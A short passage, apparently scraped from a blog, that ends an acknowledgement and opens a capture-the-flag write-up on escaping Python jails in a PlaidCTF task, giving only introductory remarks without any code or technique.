the people who helped me learning python and some of its <em>secrets</em>.</p>wapiflapiPython jails are pretty common among CTF challenges. Often a good knowledge of the interpreter’s internals gets you a long way. For the non initiated it might sometimes seem like black magic. PlaidCTF offered a challenging task that required the combination of some different techniques and logic.